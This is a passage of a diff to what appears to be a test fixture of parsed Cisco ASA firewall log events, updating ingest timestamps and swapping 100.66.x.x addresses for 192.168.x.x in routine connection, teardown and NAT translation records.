@@ -1998,8 +1998,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721329Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:100.66.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", + "ingested": "2021-12-09T13:34:28.099158900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2031,8 +2031,8 @@ }, "destination": { "port": 8257, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1773, @@ -2072,7 +2072,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2080,8 +2080,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721333600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:100.66.98.44/8257", + "ingested": "2021-12-09T13:34:28.099164300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2114,8 +2114,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" @@ -2150,7 +2150,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, 
@@ -2159,8 +2159,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721338900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", + "ingested": "2021-12-09T13:34:28.099170100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11760 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1773 (172.31.98.44/1773)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2176,7 +2176,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11760", "source_interface": "outside", "mapped_destination_port": 1773 @@ -2193,8 +2193,8 @@ }, "destination": { "port": 8258, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1774, @@ -2234,7 +2234,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2242,8 +2242,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721344200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:100.66.98.44/8258", + "ingested": "2021-12-09T13:34:28.099175900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1774 to outside:192.168.98.44/8258", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2276,8 +2276,8 @@ }, "source": { "port": 80, - "address": "100.66.252.226", - "ip": "100.66.252.226" + "address": "192.168.252.226", + "ip": "192.168.252.226" }, "tags": [ "preserve_original_event" 
@@ -2312,7 +2312,7 @@ "localhost" ], "ip": [ - "100.66.252.226", + "192.168.252.226", "172.31.98.44" ] }, @@ -2321,8 +2321,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721348500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:100.66.252.226/80 (100.66.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", + "ingested": "2021-12-09T13:34:28.099181700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11761 for outside:192.168.252.226/80 (192.168.252.226/80) to inside:172.31.98.44/1774 (172.31.98.44/1774)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2338,7 +2338,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.226", + "mapped_source_ip": "192.168.252.226", "connection_id": "11761", "source_interface": "outside", "mapped_destination_port": 1774 @@ -2360,8 +2360,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2396,7 +2396,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, @@ -2405,8 +2405,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721354500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:100.66.238.126/53 (100.66.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099187500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11762 for outside:192.168.238.126/53 (192.168.238.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -2422,7 +2422,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.238.126", + "mapped_source_ip": "192.168.238.126", "connection_id": "11762", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2444,8 +2444,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2480,7 +2480,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2489,8 +2489,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721359200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:100.66.93.51/53 (100.66.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099193300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11763 for outside:192.168.93.51/53 (192.168.93.51/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2506,7 +2506,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.93.51", + "mapped_source_ip": "192.168.93.51", "connection_id": "11763", "source_interface": "outside", "mapped_destination_port": 56132 @@ -2528,8 +2528,8 @@ }, "source": { "port": 53, - "address": "100.66.238.126", - "ip": "100.66.238.126" + "address": "192.168.238.126", + "ip": "192.168.238.126" }, "tags": [ "preserve_original_event" @@ -2564,7 +2564,7 @@ "localhost" ], "ip": [ - "100.66.238.126", + "192.168.238.126", "172.31.98.44" ] }, 
@@ -2574,8 +2574,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721363600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:100.66.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", + "ingested": "2021-12-09T13:34:28.099199Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11762 for outside:192.168.238.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 111", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2612,8 +2612,8 @@ }, "source": { "port": 53, - "address": "100.66.93.51", - "ip": "100.66.93.51" + "address": "192.168.93.51", + "ip": "192.168.93.51" }, "tags": [ "preserve_original_event" @@ -2648,7 +2648,7 @@ "localhost" ], "ip": [ - "100.66.93.51", + "192.168.93.51", "172.31.98.44" ] }, @@ -2658,8 +2658,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721368Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:100.66.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", + "ingested": "2021-12-09T13:34:28.099204700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11763 for outside:192.168.93.51/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 237", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -2691,8 +2691,8 @@ }, "destination": { "port": 8259, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1775, @@ -2732,7 +2732,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -2740,8 +2740,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721372300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:100.66.98.44/8259", + "ingested": "2021-12-09T13:34:28.099210400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1775 to outside:192.168.98.44/8259", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2774,8 +2774,8 @@ }, "source": { "port": 443, - "address": "100.66.225.103", - "ip": "100.66.225.103" + "address": "192.168.225.103", + "ip": "192.168.225.103" }, "tags": [ "preserve_original_event" @@ -2810,7 +2810,7 @@ "localhost" ], "ip": [ - "100.66.225.103", + "192.168.225.103", "172.31.98.44" ] }, @@ -2819,8 +2819,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721376500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:100.66.225.103/443 (100.66.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", + "ingested": "2021-12-09T13:34:28.099216200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11764 for outside:192.168.225.103/443 (192.168.225.103/443) to inside:172.31.98.44/1775 (172.31.98.44/1775)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -2836,7 +2836,7 @@ "destination_interface": "inside", "mapped_source_port": 443, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.225.103", + "mapped_source_ip": "192.168.225.103", "connection_id": "11764", "source_interface": "outside", "mapped_destination_port": 1775 @@ -2853,8 +2853,8 @@ }, "destination": { "port": 1189, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, 
@@ -2894,7 +2894,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -2902,8 +2902,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721380700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1189", + "ingested": "2021-12-09T13:34:28.099222100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1189", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -2936,8 +2936,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -2972,7 +2972,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, @@ -2981,8 +2981,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721384900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:100.66.240.126/53 (100.66.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099227900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11772 for outside:192.168.240.126/53 (192.168.240.126/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -2998,7 +2998,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.240.126", + "mapped_source_ip": "192.168.240.126", "connection_id": "11772", "source_interface": "outside", "mapped_destination_port": 56132 
@@ -3020,8 +3020,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3056,7 +3056,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3065,8 +3065,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721389100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:100.66.44.45/53 (100.66.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099233600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11773 for outside:192.168.44.45/53 (192.168.44.45/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3082,7 +3082,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.44.45", + "mapped_source_ip": "192.168.44.45", "connection_id": "11773", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3104,8 +3104,8 @@ }, "source": { "port": 53, - "address": "100.66.240.126", - "ip": "100.66.240.126" + "address": "192.168.240.126", + "ip": "192.168.240.126" }, "tags": [ "preserve_original_event" @@ -3140,7 +3140,7 @@ "localhost" ], "ip": [ - "100.66.240.126", + "192.168.240.126", "172.31.98.44" ] }, 
@@ -3150,8 +3150,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721393500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:100.66.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", + "ingested": "2021-12-09T13:34:28.099239300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11772 for outside:192.168.240.126/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 87", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3188,8 +3188,8 @@ }, "source": { "port": 53, - "address": "100.66.44.45", - "ip": "100.66.44.45" + "address": "192.168.44.45", + "ip": "192.168.44.45" }, "tags": [ "preserve_original_event" @@ -3224,7 +3224,7 @@ "localhost" ], "ip": [ - "100.66.44.45", + "192.168.44.45", "172.31.98.44" ] }, @@ -3234,8 +3234,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721397700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:100.66.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", + "ingested": "2021-12-09T13:34:28.099245Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11773 for outside:192.168.44.45/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 221", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3267,8 +3267,8 @@ }, "destination": { "port": 8265, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1452, @@ -3308,7 +3308,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -3316,8 +3316,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721402200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:100.66.98.44/8265", + "ingested": "2021-12-09T13:34:28.099249100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1452 to outside:192.168.98.44/8265", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3350,8 +3350,8 @@ }, "source": { "port": 80, - "address": "100.66.179.219", - "ip": "100.66.179.219" + "address": "192.168.179.219", + "ip": "192.168.179.219" }, "tags": [ "preserve_original_event" @@ -3386,7 +3386,7 @@ "localhost" ], "ip": [ - "100.66.179.219", + "192.168.179.219", "172.31.98.44" ] }, @@ -3395,8 +3395,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721406500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:100.66.179.219/80 (100.66.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", + "ingested": "2021-12-09T13:34:28.099253700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11774 for outside:192.168.179.219/80 (192.168.179.219/80) to inside:172.31.98.44/1452 (172.31.98.44/1452)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3412,7 +3412,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.179.219", + "mapped_source_ip": "192.168.179.219", "connection_id": "11774", "source_interface": "outside", "mapped_destination_port": 1452 @@ -3434,8 +3434,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" 
@@ -3470,7 +3470,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3479,8 +3479,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721418100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:100.66.157.232/53 (100.66.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099259Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11775 for outside:192.168.157.232/53 (192.168.157.232/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -3496,7 +3496,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.157.232", + "mapped_source_ip": "192.168.157.232", "connection_id": "11775", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3518,8 +3518,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3554,7 +3554,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, @@ -3563,8 +3563,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721422900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:100.66.178.133/53 (100.66.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099263900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11776 for outside:192.168.178.133/53 (192.168.178.133/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", 
@@ -3580,7 +3580,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.178.133", + "mapped_source_ip": "192.168.178.133", "connection_id": "11776", "source_interface": "outside", "mapped_destination_port": 56132 @@ -3602,8 +3602,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -3638,7 +3638,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, @@ -3648,8 +3648,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721427800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", + "ingested": "2021-12-09T13:34:28.099269800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11775 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 101", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3686,8 +3686,8 @@ }, "source": { "port": 53, - "address": "100.66.178.133", - "ip": "100.66.178.133" + "address": "192.168.178.133", + "ip": "192.168.178.133" }, "tags": [ "preserve_original_event" @@ -3722,7 +3722,7 @@ "localhost" ], "ip": [ - "100.66.178.133", + "192.168.178.133", "172.31.98.44" ] }, 
@@ -3732,8 +3732,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721436Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:100.66.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", + "ingested": "2021-12-09T13:34:28.099274100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11776 for outside:192.168.178.133/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 126", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -3765,8 +3765,8 @@ }, "destination": { "port": 8266, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1453, @@ -3806,7 +3806,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -3814,8 +3814,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721441100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:100.66.98.44/8266", + "ingested": "2021-12-09T13:34:28.099278300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1453 to outside:192.168.98.44/8266", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -3848,8 +3848,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3884,7 +3884,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, 
@@ -3893,8 +3893,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721445600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:100.66.133.112/80 (100.66.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", + "ingested": "2021-12-09T13:34:28.099281900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11777 for outside:192.168.133.112/80 (192.168.133.112/80) to inside:172.31.98.44/1453 (172.31.98.44/1453)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -3910,7 +3910,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.133.112", + "mapped_source_ip": "192.168.133.112", "connection_id": "11777", "source_interface": "outside", "mapped_destination_port": 1453 @@ -3932,8 +3932,8 @@ }, "source": { "port": 80, - "address": "100.66.133.112", - "ip": "100.66.133.112" + "address": "192.168.133.112", + "ip": "192.168.133.112" }, "tags": [ "preserve_original_event" @@ -3968,7 +3968,7 @@ "localhost" ], "ip": [ - "100.66.133.112", + "192.168.133.112", "172.31.98.44" ] }, @@ -3979,8 +3979,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721450400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:100.66.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", + "ingested": "2021-12-09T13:34:28.099286300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11777 for outside:192.168.133.112/80 to inside:172.31.98.44/1453 duration 0:00:00 bytes 862 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", 
@@ -4017,8 +4017,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4053,7 +4053,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4062,8 +4062,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721454900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:100.66.204.197/53 (100.66.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099292200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11779 for outside:192.168.204.197/53 (192.168.204.197/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -4079,7 +4079,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.204.197", + "mapped_source_ip": "192.168.204.197", "connection_id": "11779", "source_interface": "outside", "mapped_destination_port": 56132 @@ -4101,8 +4101,8 @@ }, "source": { "port": 53, - "address": "100.66.157.232", - "ip": "100.66.157.232" + "address": "192.168.157.232", + "ip": "192.168.157.232" }, "tags": [ "preserve_original_event" @@ -4137,7 +4137,7 @@ "localhost" ], "ip": [ - "100.66.157.232", + "192.168.157.232", "172.31.98.44" ] }, 
@@ -4147,8 +4147,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721459200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:100.66.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", + "ingested": "2021-12-09T13:34:28.099297900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11778 for outside:192.168.157.232/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4185,8 +4185,8 @@ }, "source": { "port": 53, - "address": "100.66.204.197", - "ip": "100.66.204.197" + "address": "192.168.204.197", + "ip": "192.168.204.197" }, "tags": [ "preserve_original_event" @@ -4221,7 +4221,7 @@ "localhost" ], "ip": [ - "100.66.204.197", + "192.168.204.197", "172.31.98.44" ] }, @@ -4231,8 +4231,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721463500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:100.66.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", + "ingested": "2021-12-09T13:34:28.099303900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11779 for outside:192.168.204.197/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 176", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -4264,8 +4264,8 @@ }, "destination": { "port": 8267, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + 